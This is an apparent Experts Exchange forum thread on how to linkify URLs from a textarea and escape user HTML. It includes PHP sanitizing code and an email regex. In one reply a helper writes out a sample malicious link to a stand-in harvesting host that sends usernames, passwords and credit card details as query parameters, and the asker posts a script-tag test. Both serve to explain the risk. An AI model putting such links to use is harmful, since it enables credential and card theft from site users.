• Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 221

this text area

Hi,

How does this site (Experts Exchange) handle the text area I'm currently writing in, specifically with URLs? I'd like to do something similar. I guess after the user submits a question they parse the text for URLs and, if one exists, replace it with an href etc.? Then when we view the question again, only straight HTML is being rendered? (i.e. there is no more text area there, right?)

Also, if this box is just a text area, how did they get this light blue font, font size and font type in it?

Any working examples of this would be great,

Thanks
Asked by minnirok

2 Solutions
 
BogoJokerCommented:
Hi minnirok,

Right now it is not a rich text editor.
The only thing that comes up cool is ANY webpage link, and personally I think that is done automatically by your browser.
For example:
http://www.google.com
www.google.com

There has been a suggestion to implement a rich text editor, and I will send you a link if you're interested in a very nice one that will format code.

Joe P
0
 
minnirokAuthor Commented:
Hi Joe,

I am mega confused, so if you're looking at this very post right now and I type www.cnn.com how can you click that link on your end? Here while I'm typing this right now I cannot click on www.cnn.com. But after I hit post I will be able to. So are they just rendering whatever text is captured in this box as straight HTML later on, with the links changed into hrefs? Or is it possible to put URLs inside a text area?

If you have a good cross-browser rich text area that'd be great to see. I'm having a lot of trouble implementing one that is cross-browser and for which I can toggle read-only vs. write state on the fly.

Thanks
0
 
BogoJokerCommented:
Most rich text editors have basic things like [b]text[/b] syntax, where when you push submit, they run their scripts and turn that into a bold tag, meanwhile any <b>text</b> text that you write will not do anything. That is the control they have placed on their text editor. I don't know if EE specifically scans the text I am writing for any www.text.com and turns that into a link. I always thought that maybe my browser finds that text and turns it into a link, but I am not sure.

The suggestion link is here:
http://www.experts-exchange.com/Community_Support/Suggestions/Q_21761945.html
The idea of a rich text editor for code he provided was:
http://qbnz.com/highlighter/

Joe P
0
 
minnirokAuthor Commented:
I think I'll just have to go with this idea of capturing the text in a textarea, then converting it to HTML for redisplay later. It seems this is what EE is doing right now.
0
 
BogoJokerCommented:
Well, if you're using PHP, when you get the value in the textbox that was submitted in a form using $_POST, then the information, if you display it right then and there, will be HTML code. For instance if the user put <b>Text</b> it would actually display Text in bold!

On the other hand if you process that text through a function like htmlspecialchars($_POST['txt']) and then display it, you will literally see this: <b>Text</b> instead of the actual bold text that would have been displayed in the situation in my original sentence.

It is MUCH safer to run the user input through such a function because the user could use some HTML code, specifically <script></script>, to damage your website. So many other people decided to make their own list of controls, hence the bracket notation [b]text[/b] would be bold, and a few others that they could control.

Joe P
0
 
minnirokAuthor Commented:
Hey Joe,

Hmm I guess EE must do that too then? I will try it right here:

<b>Some Text</b>
<u>Something else</u>
<script>alert("hello!");</script>

I'd not want to have that stuff appear as HTML, you're right. Just the links and that's it.
0
 
rattletrapCommented:
minnirok,

This is more of a CGI-ish/PHP-ish type question, but it looks like you work with PHP, MySQL, and a few other things, so explaining this (as I apply it) should be simple enough. What is happening, basically, is say I type in http://www.zap.com and it enters as plain text in the text area. Since it is plain text I cannot click on it here to test it. Once I submit this form a parsing routine should engage and look for problems and/or malicious code/text/program calls. There are a variety of ways to parse input data. A parsing routine may look for opening and/or closing brackets and convert them from invokable symbols to functional characters (i.e. the less-than sign opening bracket < might be changed to &lt;), similar to the concept you use if you want to explain to someone how to create an HTML link on their own web site. Not sure if this will present below, but I will give it a shot...
**

&lt;A href="http://www.zap.com"&gt;www.ZaP.com</A>;

**

On a standard web page the above would show all of the brackets and such to make a web link instead of just making a clickable link. At any rate, you would use all of this to ensure submissions are clear of bad stuff and then write the parsed or cleansed data to a file or database. When the web user opens the page in question the saved data file would be opened and read/interpreted, including parsing URLs to active links, or rendering to plain text form, if you the webmaster so choose. I am sure you can see the benefits and potential liabilities of parsing or not parsing URLs, but here's a quick example. Say your web site is called zap.com and you have a member login area where input such as this text is entered and read. If someone wants to mess around they could submit a link that captures data and forwards it, in the open, across the net to wherever the poster wants it to go. Not sure if the below will present due to munging and parsing on the side of EE, but I will give it a shot and I think you will immediately understand what I mean.

**

<A href="http://www.dataminer.com?username=$username&password=$password&crdcardno=$crdcardno&expdate=$expdate&authno=$authno">freemoneygrab.com</A>

**

If the above presents as a link, move your mouse over it and note the actual link (most people might not pay attention): http://www.dataminer.com?username=$username&password=$password&crdcardno=$crdcardno&expdate=$expdate&authno=$authno is the actual link and could pass data. Hope this helps answer your question; if more clarity is required let me know...

Toni
0
 
rattletrapCommented:
After posting above it looks like all EE is doing is looking for known web link identifiers and transforming them to links (not sure I like that), BUT... They seem to be looking through the data stream for character matches like http:// or www. or .com .net (whatever). They are pushing forward a straight link based on the input (note my sample above), so they take www.ZaP.com and enclose it in the href anchor tag.

Just out of curiosity how does EE parse an email address in the form of email@email.com

Toni
0
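The escape-then-linkify approach described in the last few replies (htmlspecialchars first, then turn bare http:// and www. strings into anchors whose visible text is the real target), written out as an added PHP example; this is not code from any poster or from EE, and the function names render_post, make_link and esc, as well as the sample input, are mine.

```php
<?php
declare(strict_types=1);

// Escape a fragment for safe inclusion in HTML text or attribute values.
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Wrap one detected URL in an anchor whose visible text is the URL itself,
// so a reader always sees where the link really goes. Trailing punctuation
// that the URL regex swallowed ("www.cnn.com.") is moved back outside the link.
function make_link(string $url): string
{
    $trail = '';
    if (preg_match('/^(.*?)([.,;:!?)]+)$/', $url, $m)) {
        $url   = $m[1];
        $trail = $m[2];
    }
    $href = preg_match('~^https?://~i', $url) ? $url : 'http://' . $url;
    return '<a href="' . esc($href) . '" rel="nofollow noopener">' . esc($url) . '</a>' . esc($trail);
}

// Convert a raw textarea submission to HTML: every tag the user typed is
// escaped, and only bare URLs (http://, https://, www.) become links.
function render_post(string $raw): string
{
    // Split on URLs, keeping the matches; odd indexes are the URLs.
    $parts = preg_split('~\b((?:https?://|www\.)[^\s<>"\']+)~i', $raw, -1, PREG_SPLIT_DELIM_CAPTURE);
    $html  = '';
    foreach ($parts as $i => $part) {
        $html .= ($i % 2 === 1) ? make_link($part) : esc($part);
    }
    return nl2br($html);
}

// Constructed sample input mirroring what was typed into the textarea above.
$sample = "<b>Some Text</b>\n"
        . "<script>alert(\"hello!\");</script>\n"
        . "<A href=\"http://www.dataminer.com?username=\$username\">freemoneygrab.com</A>\n"
        . "See www.cnn.com.";

echo render_post($sample), PHP_EOL;
```

In the output the typed <b>, <script> and <A> tags appear literally as escaped text, while the dataminer URL and www.cnn.com become links whose anchor text is the same address as the href.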
 
minnirokAuthor Commented:
Hi Toni,

I don't understand the danger of the web link for that dataminer.com example. What data is it actually transmitting that's harmful? I see the username=$username etc., but where is $username coming from?

Do you have any recommended parsers I could use to manage all this stuff (grabbing the contents of the text box, parsing it, returning a non-diabolical string when I want to render it as HTML later on)?

Thanks!
0
 
rattletrapCommented:
Just thinking outside the box is all...

The idea is you are passing data around as your web user does things; an improper URL COULD pass any available VARIABLES. In the imaginary situation I showed I was merely suggesting the available variables could be collected and passed. I actually forgot to type something in the link, but look below:


***
&lt;A href="http://www.dataminer.com/cgi-bin/harvest.cgi?username=$username&password=$password&crdcardno=$crdcardno&expdate=$expdate&authno=$authno"&gt;freemoneygrab.com&lt;/A&gt;


***

Okay... assuming your site has unprotected variables, someone could determine the name values you use to pass information within your site, and they could potentially collect those values when the link they upload is executed. Some variable names can be determined by viewing source code and looking at form element names. Not rocket science, tough to figure out.

In my example say dataminer.com uses a CGI script called harvest. ALL the items appearing after the ? question mark are the query string sent to the harvest script. These items can be separated into name/value pairs for use or storage. There are many ways one could collect data and pass it. In this example, since the script that presents the data they submitted with their link (on your originating web site) has executable function, the link may be able to grab things to pass. Consider STDERR, STDIN, and STDOUT as potential concerns.


<input type=text name=username>
<input type=hidden name=username value="$username">

Either of these could potentially load username = $username depending on several things.

Obviously, this example would be a malicious user and generally they are willing to invest a little time to get into things.

Short answer is: you collect their input and a smart programmer protects and controls how it is re-displayed...

Hope that helps

Toni
0
 
BogoJokerCommented:
I have not actually seen EE parse an email.
But here is a sample regular expression to detect an email:
/[a-z0-9_\-]+(\.[_a-z0-9\-]+)*@([_a-z0-9\-]+\.)+(com|edu|gov|net|org|[a-z]{2})/i

Note that this will take any two-letter combination, so joe@fake.us would work; just remove |[a-z]{2} if you don't want to accept those two-letter combinations. I also made the entire expression case-insensitive with the /i at the end.

Give credit where credit is due, I modified this email regex from the Regular Expression Tester Firefox Extension:
https://addons.mozilla.org/firefox/2077/

0
 
minnirokAuthor Commented:
Ok I will give this all a try, be back shortly.

Thanks
0
